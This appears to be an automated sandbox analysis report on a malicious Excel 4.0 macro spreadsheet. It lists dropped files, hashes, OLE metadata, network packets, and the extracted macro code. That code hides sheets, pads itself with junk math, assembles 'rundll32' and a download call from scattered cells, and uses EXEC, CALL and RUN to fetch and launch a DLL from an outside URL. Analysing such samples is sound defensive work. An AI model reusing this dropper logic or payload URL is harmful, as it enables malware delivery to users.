              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
              Malicious:false
              Reputation:high, very likely benign file
              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):326
              Entropy (8bit):3.123116142976021
              Encrypted:false
              SSDEEP:6:kK9HwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:lwTJrkPlE99SNxAhUe0ht
              MD5:4B4AF5764F733CB186F0CCE825F1B5ED
              SHA1:C6582ED75D327F03335109A190DFF5A1365AFCD6
              SHA-256:2B7B8F00FCA38B4A4FF8A7EA3D9594AAF3E68FF23A9FEB75E9663FB37B7AE25A
              SHA-512:E126E27AE9B4B1AE37D5859D215C4AD925607687C4A90BF8DB9AEBA76653628E6834D2698ED6A1466F37FCDAE160A9C047907C966837C3A348904255963EF396
              Malicious:false
              Reputation:low
              Preview: p...... ..........P(.A..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
              C:\Users\user\AppData\Local\Temp\22FE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):85602
              Entropy (8bit):7.88931065964453
              Encrypted:false
              SSDEEP:1536:7QOgB6pDwoXAeWvikWYgWGHKlMVGoIahaDHTU6hryF70/EN:7QOgB6pDdAikWYgW2K2sTU2yF70/EN
              MD5:C6DAF044B82CF7A6525839E943380AA9
              SHA1:BDE146DC0F93F31ED594B88E63234B0CE37B507C
              SHA-256:BDA5EFB761942C9A776846A7F3843DB8A42F929058899A2C086511961A4876AE
              SHA-512:04D33442367968ED7CEEA58A4EBCED3D0C550DBA595D6E9257B3ACBD5EE78BEBA3771EC32D7503EDA320F676160EB0AAC1E4BDDC1B85932830D3AB61B9584E5C
              Malicious:false
              Reputation:low
              Preview: .U.N.0.}..?D~E..*UU.Y..<.R...{...7.....q6.X.M"..K...9sf...E.U..>HkJrV,H..[!.$..n.$.....5P.-.r.:..|.:...M(I...Ei.5h.....Ne.f....:.7l..|..A.5.L.c. ...T.I....]$.Iv.;..J"u.u:..].".<..c<...b.).Y.|.g#......PK.N..'.i..........x.4..../.o.....IR.:..pPE..b.....G...y...R...}.M..X..V.. ,..X."8.L.dZ..I.=3....G.....k.....v.....G..>!..e."wf....K....m._..-.H.C.*..r:..tL.f....].=...#q..^R....z.;..].......9.=.!}.u........^'IB....G..,..."...{.... ..i;.W........PK..........!...i.............[Content_Types].xml ...(...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\CabF9EA.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
              Category:dropped
              Size (bytes):58596
              Entropy (8bit):7.995478615012125
              Encrypted:true
              SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
              MD5:61A03D15CF62612F50B74867090DBE79
              SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
              SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
              SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
              Malicious:false
              Reputation:high, very likely benign file
              Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
              C:\Users\user\AppData\Local\Temp\TarF9EB.tmp
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):152788
              Entropy (8bit):6.309740459389463
              Encrypted:false
              SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
              MD5:4E0487E929ADBBA279FD752E7FB9A5C4
              SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
              SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
              SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
              Malicious:false
              Reputation:high, very likely benign file
              Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue May 4 16:51:47 2021, atime=Tue May 4 16:51:47 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.4818941569424275
              Encrypted:false
              SSDEEP:12:85QPLgXg/XAlCPCHaXgzB8IB/0PJX+WnicvbZ1ObDtZ3YilMMEpxRljKoTdJP9TK:85Y/XTwz6IWRYe11CDv3qtrNru/
              MD5:F1FF8D1C4D84BF01C8B1A86522160A11
              SHA1:F03FC7A1E39AB3B68D2F9A1BD1BA90AA3AF9FBAB
              SHA-256:F4B4471ADED4A28203266833C5B50DB1C2DF64F9AA3D129F36262DC6458374FB
              SHA-512:0D307FA2555F46887A4A77E965F0AC55622B3BA346B154E6CFC938C123EE3675A6E4B5F726608B107D79543B7062CFCBF7C60CBBDDE7B9C3BD8F19132E4ACA75
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G....C'.A....C'.A... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rx...Desktop.d......QK.X.Rx.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......960781..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\e1df57de_by_Libranalysis.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue May 4 16:51:26 2021, mtime=Tue May 4 16:51:47 2021, atime=Tue May 4 16:51:47 2021, length=111616, window=hide
              Category:dropped
              Size (bytes):2168
              Entropy (8bit):4.549240966530211
              Encrypted:false
              SSDEEP:48:8r/XT3I8OE+ON1OE6tQh2r/XT3I8OE+ON1OE6tQ/:8r/XLI8FfN1F6tQh2r/XLI8FfN1F6tQ/
              MD5:F9085DD595E37E817A815348289D6CDB
              SHA1:7B95DFEF0D4AB964E0C712B9209777146C850BEC
              SHA-256:DF4533ADCEFA7C413E319C56A1A70CFF8A076970F17A627E2AA5C0BCF9CBD2BE
              SHA-512:3A0A0AAA4447C304275CF8C5CABD84573A826BAFE6F35DA2E368A7B994A9BF5E5AF0E6F6DB980F2E02E100DB0B32B61E2830250C4A30AD55168896ACED4D374B
              Malicious:false
              Reputation:low
              Preview: L..................F.... ....m...A....C'.A...qO'.A...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Rn...Desktop.d......QK.X.Rn.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..b...Rt. .E1DF57~1.XLS..f......Rn..Rn.*.........................e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\960781\Users.user\Desktop\e1df57de_by_Libranalysis.xls.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.1.d.f.5.7.d.e._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):125
              Entropy (8bit):4.7413886091115245
              Encrypted:false
              SSDEEP:3:oyBVomM6YiHUwSLMp6lYUIYiHUwSLMp6lmM6YiHUwSLMp6lv:dj6hi0NRi0Nbhi0Nf
              MD5:FA818B7E82A804136CCCDAEB0E371E4C
              SHA1:790C7E1C67EC725C24D5056180873455ACC57A4E
              SHA-256:6CAF0A49734FC7FE1DE034E925D1906442024E0C40C0BBA612217B0245B51B58
              SHA-512:7D1ACC9D7F01044F50BD4926CB5DBB27A83459CB0EFE966A73F8C1803A7AB3FD2EA347C9ABAE584DAFE1EC152E918722C2F1BD4ACD4FFC2A296EDCEE6790DE00
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..e1df57de_by_Libranalysis.LNK=0..[xls]..e1df57de_by_Libranalysis.LNK=0..
              C:\Users\user\Desktop\03FE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:Applesoft BASIC program data, first line number 16
              Category:dropped
              Size (bytes):160650
              Entropy (8bit):6.660755185518192
              Encrypted:false
              SSDEEP:3072:7V8rmjAItyzElBIL6lECbgBGGP5xLm7T22nTUSyF70WieW2bjK6kbjKNV8rmjAIm:Z8rmjAItyzElBIL6lECbgBvP5Nm7TxUG
              MD5:901913EE5C0F88F90E8DB1A4E6F210BF
              SHA1:C7EE91F62B1B945DDF05EA522E4912F591AA6596
              SHA-256:3A01E49B950685FF980A1C5F9EA2F77B61102AB9858D6101189F2B59B1914492
              SHA-512:2639E2C9B8BE0A497C328108FEE4B29DE9E143180D51D5821C481C2C74B6A2956F854D23C494F09EBA6EF4843F073B62EB0AA35929A0DDBFCC57F33F39031AE2
              Malicious:false
              Reputation:low
              Preview: ........g2..........................\.p....user B.....a.........=...................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...@...8...........C.a.l.i.b.r.i.1...@...............C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......

              Static File Info

              General

              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: 5, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Apr 28 08:31:09 2021, Security: 0
              Entropy (8bit):3.26064272206503
              TrID:
              • Microsoft Excel sheet (30009/1) 78.94%
              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
              File name:e1df57de_by_Libranalysis.xls
              File size:287232
              MD5:e1df57deebdfeab450bf91049acff902
              SHA1:0037a523a17be3411b88072f7ceb3cc0ef384da7
              SHA256:b0cccc9e79029c5b0b4e835e22e783a37ded6a300ca9d1738e554b126dd0969c
              SHA512:3a2878bee800832e2eac6705d4b299b0814af28bf47dc0504a1425b87f9728f94a208222d3da907a35ce6c0cce0bce279cb765060e1fa464656bc83d4cfd9c87
              SSDEEP:6144:YcPiTQAVW/89BQnmlcGvgZ7r3J8b5ICJK+T5gE:lDE
              File Content Preview:........................>......................./...........................*...+...,...-......................................................................................................................................................................

              File Icon

              Icon Hash:e4eea286a4b4bcb4

              Static OLE Info

              General

              Document Type:OLE
              Number of OLE Files:1

              OLE File "e1df57de_by_Libranalysis.xls"

              Indicators

              Has Summary Info:True
              Application Name:Microsoft Excel
              Encrypted Document:False
              Contains Word Document Stream:False
              Contains Workbook/Book Stream:True
              Contains PowerPoint Document Stream:False
              Contains Visio Document Stream:False
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Code Page:1251
              Last Saved By:5
              Create Time:2006-09-16 00:00:00
              Last Saved Time:2021-04-28 07:31:09
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Document Code Page:1251
              Thumbnail Scaling Desired:False
              Contains Dirty Links:False

              Streams

              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5DocumentSummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.344544096356
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . S h e e t 1 . . . . . S h e e t 5 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . S h e e t 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 d4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 91 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 06 00 00 00
              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
              General
              Stream Path:\x5SummaryInformation
              File Type:data
              Stream Size:4096
              Entropy:0.239529171145
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . t . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 275392
              General
              Stream Path:Book
              File Type:Applesoft BASIC program data, first line number 8
              Stream Size:275392
              Entropy:3.23578403018
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 4 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
              Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

              Macro 4.0 Code

              ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,https://obsusa.net/chemgrcr.dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\qqjdkdl.obp""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=WORKBOOK.HIDE(""Sheet2"")=WORKBOOK.HIDE(""Sheet3"")=WORKBOOK.HIDE(""Sheet4"")=WORKBOOK.HIDE(""Sheet5"")",,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,JJC,,,,,,,,,,,,,,,,,,,,,U,,,,,,,,,,,,,,,,,,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,D,,,,,,,,,,,,,,,,,,,,L,,,,,CBB,,,,,,,,,,,,,,,,,,,,L,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,w,o,,,,,,,,,,,,,,,,,,M,,,,,,,,,,,,,,,"=LEFT(""URdndiond"",2)",,,,,,,o,,,,n,,,,,,,,,,,,,,,,,,,,l,,,,,,,,,,,,,,,,,,,,,n,,,o,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,rund,,,,,,,,,,,,,,,,,,,,,,,,,,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",St",,,,,,,,,,,,,,,,,,,,"=""ll32 """,,ar,,,,,,,,,,,,,,,,,,,,,,tW,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
              =ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=EXEC(Sheet3!BN47&Sheet3!BM53&Sheet3!BU19&Sheet3!BO52&Sheet3!BO53&Sheet3!BO54)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=RUN(Sheet3!BG25)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)
              "=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=CALL(Sheet3!CA36&Sheet3!BM32&Sheet3!BL36&Sheet3!BL37&Sheet3!BM39,Sheet3!BP28&Sheet3!BP29&Sheet3!BP33&Sheet3!BO31&Sheet3!BP35&Sheet3!BO35&Sheet3!BP37&Sheet3!BN38&Sheet3!BP39&Sheet5!BM31&Sheet5!BF30,Sheet3!BQ27&Sheet3!BR32,Sheet3!BQ41,Sheet3!BU15,Sheet3!BU19,Sheet3!BR48,Sheet3!BS39)=Sheet4!BH32()&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&"""""

              Network Behavior

              Network Port Distribution

              TCP Packets

              Timestamp                            Source Port  Dest Port  Source IP       Dest IP
              May 4, 2021 10:51:31.564574003 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.704153061 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.704309940 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.749247074 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.886821032 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.887329102 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.887353897 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.887377977 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.887398005 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.887430906 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.888020039 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.889327049 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:31.889425993 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:31.901334047 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:32.039360046 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:32.039531946 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:33.127418041 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:33.304382086 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.259905100 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.259953976 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.259977102 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.259998083 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.260013103 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.260030985 CEST  443          49165      170.249.236.47  192.168.2.22
              May 4, 2021 10:51:34.260094881 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:34.260123014 CEST  49165        443        192.168.2.22    170.249.236.47
              May 4, 2021 10:51:34.260957956 CEST  49165        443        192.168.2.22    170.249.236.47
